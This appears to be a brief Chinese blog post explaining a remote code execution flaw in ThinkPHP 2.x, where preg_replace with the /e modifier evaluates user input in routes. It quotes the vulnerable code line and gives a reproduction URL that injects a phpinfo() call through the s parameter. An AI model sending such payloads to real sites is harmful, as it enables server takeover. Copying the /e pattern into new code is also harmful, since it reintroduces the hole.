Thinkphp 2.x rce
Posted 【码猿】
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Thinkphp 2.x rce相关的知识,希望对你有一定的参考价值。
Thinkphp 2.x rce
Thinkphp简介
Thinkphp 是一个开源的,快速、简单的面向对象的轻量级PHP开发框架
漏洞影响版本
Thinkphp 2.x
漏洞概述
ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\\w+)'.$depr.'([^'.$depr.'\\/]+)@e', '$var[\\'\\\\1\\']="\\\\2";', implode($depr,$paths));
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。
漏洞复现
http://BaseUrl/index.php?s=/a/a/a/$@phpinfo()
以上是关于Thinkphp 2.x rce的主要内容,如果未能解决你的问题,请参考以下文章
14-PHP代码审计——ThinkPHP5.0.23 RCE漏洞分析